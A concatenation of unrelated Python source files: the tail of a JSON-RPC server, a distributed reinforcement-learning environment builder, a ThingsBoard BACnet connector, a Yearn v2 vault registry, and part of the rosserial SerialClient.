in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
distributed.py
|
'''Builders for distributed training.'''
import multiprocessing
import numpy as np
class Sequential:
'''A group of environments used in sequence.'''
def __init__(self, environment_builder, max_episode_steps, workers):
self.environments = [environment_builder() for _ in range(workers)]
self.max_episode_steps = max_episode_steps
self.observation_space = self.environments[0].observation_space
self.action_space = self.environments[0].action_space
self.name = self.environments[0].name
def initialize(self, seed):
for i, environment in enumerate(self.environments):
environment.seed(seed + i)
def start(self):
'''Used once to get the initial observations.'''
observations = [env.reset() for env in self.environments]
self.lengths = np.zeros(len(self.environments), int)
return np.array(observations, np.float32)
def step(self, actions):
next_observations = [] # Observations for the transitions.
rewards = []
resets = []
terminations = []
observations = [] # Observations for the actions selection.
for i in range(len(self.environments)):
ob, rew, term, _ = self.environments[i].step(actions[i])
self.lengths[i] += 1
# Timeouts trigger resets but are not true terminations.
reset = term or self.lengths[i] == self.max_episode_steps
next_observations.append(ob)
rewards.append(rew)
resets.append(reset)
terminations.append(term)
if reset:
ob = self.environments[i].reset()
self.lengths[i] = 0
observations.append(ob)
observations = np.array(observations, np.float32)
infos = dict(
observations=np.array(next_observations, np.float32),
rewards=np.array(rewards, np.float32),
resets=np.array(resets, np.bool),
terminations=np.array(terminations, np.bool))
return observations, infos
def render(self, mode='human', *args, **kwargs):
outs = []
for env in self.environments:
out = env.render(mode=mode, *args, **kwargs)
outs.append(out)
if mode != 'human':
return np.array(outs)
class Parallel:
'''A group of sequential environments used in parallel.'''
def __init__(
self, environment_builder, worker_groups, workers_per_group,
max_episode_steps
):
self.environment_builder = environment_builder
self.worker_groups = worker_groups
self.workers_per_group = workers_per_group
self.max_episode_steps = max_episode_steps
def initialize(self, seed):
def proc(action_pipe, index, seed):
'''Process holding a sequential group of environments.'''
envs = Sequential(
self.environment_builder, self.max_episode_steps,
self.workers_per_group)
envs.initialize(seed)
observations = envs.start()
self.output_queue.put((index, observations))
while True:
actions = action_pipe.recv()
out = envs.step(actions)
self.output_queue.put((index, out))
dummy_environment = self.environment_builder()
self.observation_space = dummy_environment.observation_space
self.action_space = dummy_environment.action_space
del dummy_environment
self.started = False
self.output_queue = multiprocessing.Queue()
self.action_pipes = []
for i in range(self.worker_groups):
pipe, worker_end = multiprocessing.Pipe()
self.action_pipes.append(pipe)
group_seed = seed + i * self.workers_per_group
process = multiprocessing.Process(
target=proc, args=(worker_end, i, group_seed))
process.daemon = True
process.start()
def start(self):
'''Used once to get the initial observations.'''
assert not self.started
self.started = True
observations_list = [None for _ in range(self.worker_groups)]
for _ in range(self.worker_groups):
index, observations = self.output_queue.get()
observations_list[index] = observations
self.observations_list = np.array(observations_list)
self.next_observations_list = np.zeros_like(self.observations_list)
self.rewards_list = np.zeros(
(self.worker_groups, self.workers_per_group), np.float32)
self.resets_list = np.zeros(
(self.worker_groups, self.workers_per_group), np.bool)
self.terminations_list = np.zeros(
(self.worker_groups, self.workers_per_group), np.bool)
return np.concatenate(self.observations_list)
def step(self, actions):
actions_list = np.split(actions, self.worker_groups)
for actions, pipe in zip(actions_list, self.action_pipes):
pipe.send(actions)
for _ in range(self.worker_groups):
index, (observations, infos) = self.output_queue.get()
self.observations_list[index] = observations
self.next_observations_list[index] = infos['observations']
self.rewards_list[index] = infos['rewards']
self.resets_list[index] = infos['resets']
self.terminations_list[index] = infos['terminations']
observations = np.concatenate(self.observations_list)
infos = dict(
observations=np.concatenate(self.next_observations_list),
rewards=np.concatenate(self.rewards_list),
resets=np.concatenate(self.resets_list),
terminations=np.concatenate(self.terminations_list))
return observations, infos
def distribute(environment_builder, worker_groups=1, workers_per_group=1):
'''Distributes workers over parallel and sequential groups.'''
dummy_environmentironment = environment_builder()
max_episode_steps = dummy_environmentironment.max_episode_steps
del dummy_environmentironment
if worker_groups < 2:
return Sequential(
environment_builder, max_episode_steps=max_episode_steps,
workers=workers_per_group)
return Parallel(
environment_builder, worker_groups=worker_groups,
workers_per_group=workers_per_group,
max_episode_steps=max_episode_steps)
|
bacnet_connector.py
|
# Copyright 2022. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from queue import Queue
from random import choice
from string import ascii_lowercase
from threading import Thread
from time import sleep, time
from thingsboard_gateway.tb_utility.tb_loader import TBModuleLoader
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
try:
from bacpypes.core import run, stop
except ImportError:
print("BACnet library not found - installing...")
TBUtility.install_package("bacpypes", ">=0.18.0")
from bacpypes.core import run, stop
from bacpypes.pdu import Address, GlobalBroadcast, LocalBroadcast, LocalStation, RemoteStation
from thingsboard_gateway.connectors.connector import Connector, log
from thingsboard_gateway.connectors.bacnet.bacnet_utilities.tb_gateway_bacnet_application import TBBACnetApplication
class BACnetConnector(Thread, Connector):
def __init__(self, gateway, config, connector_type):
self._connector_type = connector_type
self.statistics = {'MessagesReceived': 0,
'MessagesSent': 0}
super().__init__()
self.__config = config
self.setName(config.get('name', 'BACnet ' + ''.join(choice(ascii_lowercase) for _ in range(5))))
self.__devices = []
self.__device_indexes = {}
self.__devices_address_name = {}
self.__gateway = gateway
self._application = TBBACnetApplication(self, self.__config)
self.__bacnet_core_thread = Thread(target=run, name="BACnet core thread", daemon=True,
kwargs={"sigterm": None, "sigusr1": None})
self.__bacnet_core_thread.start()
self.__stopped = False
self.__config_devices = self.__config["devices"]
self.default_converters = {
"uplink_converter": TBModuleLoader.import_module(self._connector_type, "BACnetUplinkConverter"),
"downlink_converter": TBModuleLoader.import_module(self._connector_type, "BACnetDownlinkConverter")}
self.__request_functions = {"writeProperty": self._application.do_write_property,
"readProperty": self._application.do_read_property,
"risingEdge": self._application.do_binary_rising_edge}
self.__available_object_resources = {}
self.rpc_requests_in_progress = {}
self.__connected = False
self.daemon = True
self.__convert_and_save_data_queue = Queue()
def open(self):
self.__stopped = False
self.start()
def run(self):
self.__connected = True
self.scan_network()
self._application.do_whois()
log.debug("WhoIsRequest has been sent.")
self.scan_network()
while not self.__stopped:
sleep(.2)
for device in self.__devices:
try:
if device.get("previous_check") is None or time() * 1000 - device["previous_check"] >= device[
"poll_period"]:
for mapping_type in ["attributes", "telemetry"]:
for config in device[mapping_type]:
if config.get("uplink_converter") is None or config.get("downlink_converter") is None:
self.__load_converters(device)
data_to_application = {
"device": device,
"mapping_type": mapping_type,
"config": config,
"callback": self.__bacnet_device_mapping_response_cb
}
self._application.do_read_property(**data_to_application)
device["previous_check"] = time() * 1000
else:
sleep(.2)
except Exception as e:
log.exception(e)
if not self.__convert_and_save_data_queue.empty():
for _ in range(self.__convert_and_save_data_queue.qsize()):
thread = Thread(target=self.__convert_and_save_data, args=(self.__convert_and_save_data_queue,),
daemon=True)
thread.start()
def close(self):
self.__stopped = True
self.__connected = False
stop()
def get_name(self):
return self.name
def is_connected(self):
return self.__connected
def on_attributes_update(self, content):
try:
log.debug('Recieved Attribute Update Request: %r', str(content))
for device in self.__devices:
if device["deviceName"] == content["device"]:
for request in device["attribute_updates"]:
if request["config"].get("requestType") is not None:
for attribute in content["data"]:
if attribute == request["key"]:
request["iocb"][1]["config"].update({"propertyValue": content["data"][attribute]})
kwargs = request["iocb"][1]
iocb = request["iocb"][0](device, **kwargs)
self.__request_functions[request["config"]["requestType"]](iocb)
return
else:
log.error("\"requestType\" not found in request configuration for key %s device: %s",
request.get("key", "[KEY IS EMPTY]"),
device["deviceName"])
except Exception as e:
log.exception(e)
def server_side_rpc_handler(self, content):
try:
log.debug('Recieved RPC Request: %r', str(content))
for device in self.__devices:
if device["deviceName"] == content["device"]:
method_found = False
for request in device["server_side_rpc"]:
if request["config"].get("requestType") is not None:
if content["data"]["method"] == request["method"]:
method_found = True
kwargs = request["iocb"][1]
timeout = time() * 1000 + request["config"].get("requestTimeout", 200)
if content["data"].get("params") is not None:
kwargs["config"].update({"propertyValue": content["data"]["params"]})
iocb = request["iocb"][0](device, **kwargs)
self.__request_functions[request["config"]["requestType"]](device=iocb,
callback=self.__rpc_response_cb)
self.rpc_requests_in_progress[iocb] = {"content": content,
"uplink_converter": request["uplink_converter"]}
# self.__gateway.register_rpc_request_timeout(content,
# timeout,
# iocb,
# self.__rpc_cancel_processing)
else:
log.error("\"requestType\" not found in request configuration for key %s device: %s",
request.get("key", "[KEY IS EMPTY]"),
device["deviceName"])
if not method_found:
log.error("RPC method %s not found in configuration", content["data"]["method"])
self.__gateway.send_rpc_reply(content["device"], content["data"]["id"], success_sent=False)
except Exception as e:
log.exception(e)
def __rpc_response_cb(self, iocb, callback_params=None):
device = self.rpc_requests_in_progress[iocb]
converter = device["uplink_converter"]
content = device["content"]
if iocb.ioResponse:
apdu = iocb.ioResponse
log.debug("Received callback with Response: %r", apdu)
converted_data = converter.convert(None, apdu)
if converted_data is None:
converted_data = {"success": True}
self.__gateway.send_rpc_reply(content["device"], content["data"]["id"], converted_data)
# self.__gateway.rpc_with_reply_processing(iocb, converted_data or {"success": True})
elif iocb.ioError:
log.exception("Received callback with Error: %r", iocb.ioError)
data = {"error": str(iocb.ioError)}
self.__gateway.send_rpc_reply(content["device"], content["data"]["id"], data)
log.debug(iocb.ioError)
else:
log.error("Received unknown RPC response callback from device: %r", iocb)
def __rpc_cancel_processing(self, iocb):
log.info("RPC with iocb %r - cancelled.", iocb)
def scan_network(self):
self._application.do_whois()
log.debug("WhoIsRequest has been sent.")
for device in self.__config_devices:
try:
if self._application.check_or_add(device):
for mapping_type in ["attributes", "timeseries"]:
for config in device[mapping_type]:
if config.get("uplink_converter") is None or config.get("downlink_converter") is None:
self.__load_converters(device)
data_to_application = {
"device": device,
"mapping_type": mapping_type,
"config": config,
"callback": self.__bacnet_device_mapping_response_cb
}
self._application.do_read_property(**data_to_application)
except Exception as e:
log.exception(e)
def __convert_and_save_data(self, queue):
converter, mapping_type, config, iocb = queue.get()
converted_data = {}
try:
converted_data = converter.convert((mapping_type, config),
iocb.ioResponse if iocb.ioResponse else iocb.ioError)
except Exception as e:
log.exception(e)
self.__gateway.send_to_storage(self.name, converted_data)
def __bacnet_device_mapping_response_cb(self, iocb, callback_params):
mapping_type = callback_params["mapping_type"]
config = callback_params["config"]
converted_data = {}
converter = callback_params["config"].get("uplink_converter")
if converter is None:
for device in self.__devices:
self.__load_converters(device)
else:
converter = callback_params["config"].get("uplink_converter")
try:
converted_data = converter.convert((mapping_type, config),
iocb.ioResponse if iocb.ioResponse else iocb.ioError)
except Exception as e:
log.exception(e)
self.__gateway.send_to_storage(self.name, converted_data)
def __load_converters(self, device):
datatypes = ["attributes", "telemetry", "attribute_updates", "server_side_rpc"]
for datatype in datatypes:
for datatype_config in device.get(datatype, []):
try:
for converter_type in self.default_converters:
converter_object = self.default_converters[converter_type] if datatype_config.get(
"class") is None else TBModuleLoader.import_module(self._connector_type,
device.get("class"))
datatype_config[converter_type] = converter_object(device)
except Exception as e:
log.exception(e)
def add_device(self, data):
if self.__devices_address_name.get(data["address"]) is None:
for device in self.__config_devices:
if device["address"] == data["address"]:
try:
config_address = Address(device["address"])
device_name_tag = TBUtility.get_value(device["deviceName"], get_tag=True)
device_name = device["deviceName"].replace("${" + device_name_tag + "}", data.pop("name"))
device_information = {
**data,
**self.__get_requests_configs(device),
"type": device["deviceType"],
"config": device,
"attributes": device.get("attributes", []),
"telemetry": device.get("timeseries", []),
"poll_period": device.get("pollPeriod", 5000),
"deviceName": device_name,
}
if config_address == data["address"] or \
(config_address, GlobalBroadcast) or \
(isinstance(config_address, LocalBroadcast) and isinstance(device["address"],
LocalStation)) or \
(isinstance(config_address, (LocalStation, RemoteStation)) and isinstance(
data["address"], (
LocalStation, RemoteStation))):
self.__devices_address_name[data["address"]] = device_information["deviceName"]
self.__devices.append(device_information)
log.debug(data["address"].addrType)
except Exception as e:
log.exception(e)
def __get_requests_configs(self, device):
result = {"attribute_updates": [], "server_side_rpc": []}
for request in device.get("attributeUpdates", []):
kwarg_dict = {
"config": request,
"request_type": request["requestType"]
}
request_config = {
"key": request["key"],
"iocb": (self._application.form_iocb, kwarg_dict),
"config": request
}
result["attribute_updates"].append(request_config)
for request in device.get("serverSideRpc", []):
kwarg_dict = {
"config": request,
"request_type": request["requestType"]
}
request_config = {
"method": request["method"],
"iocb": (self._application.form_iocb, kwarg_dict),
"config": request
}
result["server_side_rpc"].append(request_config)
return result
|
registry.py
|
import logging
import threading
import time
from typing import List
from brownie import Contract, chain, web3
from joblib import Parallel, delayed
from web3._utils.abi import filter_by_name
from web3._utils.events import construct_event_topic_set
from yearn.events import create_filter, decode_logs, get_logs_asap
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
from yearn.utils import contract_creation_block, Singleton
from yearn.v2.vaults import Vault
logger = logging.getLogger(__name__)
class Registry(metaclass=Singleton):
def __init__(self):
self.releases = {} # api_version => template
self._vaults = {} # address -> Vault
self._experiments = {} # address => Vault
self.governance = None
self.tags = {}
# track older registries to pull experiments
self.registries = self.load_from_ens()
# load registry state in the background
self._done = threading.Event()
self._thread = threading.Thread(target=self.watch_events, daemon=True)
self._thread.start()
def load_from_ens(self):
resolver = Contract('0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41')
topics = construct_event_topic_set(
filter_by_name('AddressChanged', resolver.abi)[0],
web3.codec,
{'node': web3.ens.namehash('v2.registry.ychad.eth')},
)
events = decode_logs(get_logs_asap(str(resolver), topics))
logger.info('loaded %d registry versions', len(events))
return [Contract(event['newAddress']) for event in events]
@property
def vaults(self) -> List[Vault]:
self._done.wait()
return list(self._vaults.values())
@property
def experiments(self) -> List[Vault]:
self._done.wait()
return list(self._experiments.values())
def __repr__(self) -> str:
self._done.wait()
return f"<Registry releases={len(self.releases)} vaults={len(self.vaults)} experiments={len(self.experiments)}>"
def load_vaults(self):
if not self._thread._started.is_set():
self._thread.start()
self._done.wait()
def watch_events(self):
start = time.time()
self.log_filter = create_filter([str(addr) for addr in self.registries])
for block in chain.new_blocks(height_buffer=12):
logs = self.log_filter.get_new_entries()
self.process_events(decode_logs(logs))
if not self._done.is_set():
self._done.set()
logger.info("loaded v2 registry in %.3fs", time.time() - start)
time.sleep(300)
def process_events(self, events):
for event in events:
logger.debug("%s %s %s", event.address, event.name, dict(event))
if event.name == "NewGovernance":
self.governance = event["governance"]
if event.name == "NewRelease":
self.releases[event["api_version"]] = Contract(event["template"])
if event.name == "NewVault":
# experiment was endorsed
if event["vault"] in self._experiments:
vault = self._experiments.pop(event["vault"])
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("endorsed vault %s %s", vault.vault, vault.name)
# we already know this vault from another registry
elif event["vault"] not in self._vaults:
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("new vault %s %s", vault.vault, vault.name)
if event.name == "NewExperimentalVault":
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']} {event['vault'][:8]}"
self._experiments[event["vault"]] = vault
logger.debug("new experiment %s %s", vault.vault, vault.name)
if event.name == "VaultTagged":
self.tags[event["vault"]] = event["tag"]
def vault_from_event(self, event):
return Vault(
vault=Contract.from_abi("Vault", event["vault"], self.releases[event["api_version"]].abi),
token=event["token"],
api_version=event["api_version"],
registry=self,
)
def load_strategies(self):
# stagger loading strategies to not run out of connections in the pool
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_strategies)() for vault in vaults)
def load_harvests(self):
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_harvests)() for vault in vaults)
def describe(self, block=None):
vaults = self.vaults + self.experiments
results = Parallel(8, "threading")(delayed(vault.describe)(block=block) for vault in vaults)
return {vault.name: result for vault, result in zip(vaults, results)}
def total_value_at(self, block=None):
vaults = self.active_vaults_at(block)
prices = Parallel(8, "threading")(delayed(magic.get_price)(str(vault.token), block=block) for vault in vaults)
results = fetch_multicall(*[[vault.vault, "totalAssets"] for vault in vaults], block=block)
return {vault.name: assets * price / vault.scale for vault, assets, price in zip(vaults, results, prices)}
def active_vaults_at(self, block=None):
vaults = self.vaults + self.experiments
if block:
vaults = [vault for vault in vaults if contract_creation_block(str(vault.vault)) <= block]
# fixes edge case: a vault is not necessarily initialized on creation
activations = fetch_multicall(*[[vault.vault, 'activation'] for vault in vaults], block=block)
return [vault for vault, activation in zip(vaults, activations) if activation]
|
SerialClient.py
|
#!/usr/bin/env python
#####################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = "mferguson@willowgarage.com (Michael Ferguson)"
import roslib;
import rospy
import thread
import multiprocessing
from serial import *
import StringIO
from std_msgs.msg import Time
from rosserial_msgs.msg import *
from rosserial_msgs.srv import *
import diagnostic_msgs.msg
import socket
import time
import struct
import signal
def load_pkg_module(package, directory):
#check if its in the python path
in_path = False
path = sys.path
pkg_src = package+'/src' #check for the source directory which
# is added to path by roslib boostrapping
for entry in sys.path:
if pkg_src in entry:
in_path = True
if not in_path:
roslib.load_manifest(package)
try:
m = __import__( package + '.' + directory )
except:
rospy.logerr( "Cannot import package : %s"% package )
rospy.logerr( "sys.path was " + str(path) )
return None
return m
def load_message(package, message):
m = load_pkg_module(package, 'msg')
m2 = getattr(m, 'msg')
return getattr(m2, message)
def load_service(package,service):
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
srv = getattr(s, service)
mreq = getattr(s, service+"Request")
mres = getattr(s, service+"Response")
return srv,mreq,mres
class Publisher:
"""
Publisher forwards messages from the serial device to ROS.
"""
def __init__(self, topic_info):
""" Create a new publisher. """
self.topic = topic_info.topic_name
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.publisher = rospy.Publisher(self.topic, self.message, queue_size=10)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def handlePacket(self, data):
""" Forward message to ROS network. """
m = self.message()
m.deserialize(data)
self.publisher.publish(m)
class Subscriber:
"""
Subscriber forwards messages from ROS to the serial device.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.id = topic_info.topic_id
self.parent = parent
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.subscriber = rospy.Subscriber(self.topic, self.message, self.callback)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def unregister(self):
rospy.loginfo("Removing subscriber: %s", self.topic)
self.subscriber.unregister()
def callback(self, msg):
""" Forward message to serial device. """
data_buffer = StringIO.StringIO()
msg.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
def unregister(self):
self.subscriber.unregister()
class ServiceServer:
"""
ServiceServer responds to requests from ROS.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
self.service = rospy.Service(self.topic, srv, self.callback)
# response message
self.data = None
def unregister(self):
rospy.loginfo("Removing service: %s", self.topic)
self.service.shutdown()
def callback(self, req):
""" Forward request to serial device. """
data_buffer = StringIO.StringIO()
req.serialize(data_buffer)
self.response = None
if self.parent.send(self.id, data_buffer.getvalue()) >= 0:
while self.response == None:
pass
return self.response
def handlePacket(self, data):
""" Forward response to ROS network. """
r = self.mres()
r.deserialize(data)
self.response = r
class ServiceClient:
"""
ServiceServer responds to requests from ROS.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
rospy.loginfo("Starting service client, waiting for service '" + self.topic + "'")
rospy.wait_for_service(self.topic)
self.proxy = rospy.ServiceProxy(self.topic, srv)
def handlePacket(self, data):
""" Forward request to ROS network. """
req = self.mreq()
req.deserialize(data)
# call service proxy
resp = self.proxy(req)
# serialize and publish
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
class RosSerialServer:
"""
RosSerialServer waits for a socket connection then passes itself, forked as a
new process, to SerialClient which uses it as a serial port. It continues to listen
for additional connections. Each forked process is a new ros node, and proxies ros
operations (e.g. publish/subscribe) from its connection to the rest of ros.
"""
def __init__(self, tcp_portnum, fork_server=False):
print "Fork_server is: ", fork_server
self.tcp_portnum = tcp_portnum
self.fork_server = fork_server
def listen(self):
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#bind the socket to a public host, and a well-known port
self.serversocket.bind(("", self.tcp_portnum)) #become a server socket
self.serversocket.listen(1)
while True:
#accept connections
print "waiting for socket connection"
(clientsocket, address) = self.serversocket.accept()
#now do something with the clientsocket
rospy.loginfo("Established a socket connection from %s on port %s" % (address))
self.socket = clientsocket
self.isConnected = True
if (self.fork_server == True): # if configured to launch server in a separate process
rospy.loginfo("Forking a socket server process")
process = multiprocessing.Process(target=self.startSocketServer, args=(address))
process.daemon = True
process.start()
rospy.loginfo("launched startSocketServer")
else:
rospy.loginfo("calling startSerialClient")
self.startSerialClient()
rospy.loginfo("startSerialClient() exited")
def startSerialClient(self):
client = SerialClient(self)
try:
client.run()
except KeyboardInterrupt:
pass
except RuntimeError:
rospy.loginfo("RuntimeError exception caught")
self.isConnected = False
except socket.error:
rospy.loginfo("socket.error exception caught")
self.isConnected = False
finally:
self.socket.close()
for sub in client.subscribers.values():
sub.unregister()
for srv in client.services.values():
srv.unregister()
#pass
def startSocketServer(self, port, address):
rospy.loginfo("starting ROS Serial Python Node serial_node-%r" % (address,))
rospy.init_node("serial_node_%r" % (address,))
self.startSerialClient()
def flushInput(self):
pass
def write(self, data):
if (self.isConnected == False):
return
length = len(data)
totalsent = 0
while totalsent < length:
sent = self.socket.send(data[totalsent:])
if sent == 0:
raise RuntimeError("RosSerialServer.write() socket connection broken")
totalsent = totalsent + sent
def read(self, rqsted_length):
self.msg = ''
if (self.isConnected == False):
return self.msg
while len(self.msg) < rqsted_length:
chunk = self.socket.recv(rqsted_length - len(self.msg))
if chunk == '':
raise RuntimeError("RosSerialServer.read() socket connection broken")
self.msg = self.msg + chunk
return self.msg
def close(self):
self.port.close()
def inWaiting(self):
try: # the caller checks just for <1, so we'll peek at just one byte
chunk = self.socket.recv(1, socket.MSG_DONTWAIT|socket.MSG_PEEK)
if chunk == '':
raise RuntimeError("RosSerialServer.inWaiting() socket connection broken")
return len(chunk)
except socket.error, e:
if e.args[0] == errno.EWOULDBLOCK:
return 0
raise
class SerialClient:
"""
ServiceServer responds to requests from the serial device.
"""
def __init__(self, port=None, baud=57600, timeout=5.0):
""" Initialize node, connect to bus, attempt to negotiate topics. """
self.mutex = thread.allocate_lock()
self.lastsync = rospy.Time(0)
self.lastsync_lost = rospy.Time(0)
self.timeout = timeout
self.synced = False
self.pub_diagnostics = rospy.Publisher('/diagnostics', diagnostic_msgs.msg.DiagnosticArray, queue_size=10)
if port== None:
# no port specified, listen for any new port?
pass
elif hasattr(port, 'read'):
#assume its a filelike object
self.port=port
else:
# open a specific port
try:
self.port = Serial(port, baud, timeout=self.timeout*0.5)
except SerialException as e:
rospy.logerr("Error opening serial: %s", e)
rospy.signal_shutdown("Error opening serial: %s" % e)
raise SystemExit
self.port.timeout = 0.01 # Edit the port timeout
time.sleep(0.1) # Wait for ready (patch for Uno)
# hydro introduces protocol ver2 which must match node_handle.h
# The protocol version is sent as the 2nd sync byte emitted by each end
self.protocol_ver1 = '\xff'
self.protocol_ver2 = '\xfe'
self.protocol_ver = self.protocol_ver2
self.publishers = dict() # id:Publishers
self.subscribers = dict() # topic:Subscriber
self.services = dict() # topic:Service
self.buffer_out = -1
self.buffer_in = -1
self.callbacks = dict()
# endpoints for creating new pubs/subs
self.callbacks[TopicInfo.ID_PUBLISHER] = self.setupPublisher
self.callbacks[TopicInfo.ID_SUBSCRIBER] = self.setupSubscriber
# service client/servers have 2 creation endpoints (a publisher and a subscriber)
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_PUBLISHER] = self.setupServiceServerPublisher
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_SUBSCRIBER] = self.setupServiceServerSubscriber
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_PUBLISHER] = self.setupServiceClientPublisher
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_SUBSCRIBER] = self.setupServiceClientSubscriber
# custom endpoints
self.callbacks[TopicInfo.ID_PARAMETER_REQUEST] = self.handleParameterRequest
self.callbacks[TopicInfo.ID_LOG] = self.handleLoggingRequest
self.callbacks[TopicInfo.ID_TIME] = self.handleTimeRequest
rospy.sleep(2.0) # TODO
self.requestTopics()
self.lastsync = rospy.Time.now()
signal.signal(signal.SIGINT, self.txStopRequest)
def requestTopics(self):
""" Determine topics to subscribe/publish. """
self.port.flushInput()
# request topic sync
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x00\x00\xff")
def txStopRequest(self, signal, frame):
""" send stop tx request to arduino when receive SIGINT(Ctrl-c)"""
self.port.flushInput()
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x0b\x00\xf4")
# tx_stop_request is x0b
rospy.loginfo("Send tx stop request")
sys.exit(0)
def tryRead(self, length):
try:
bytes_read = self.port.read(length)
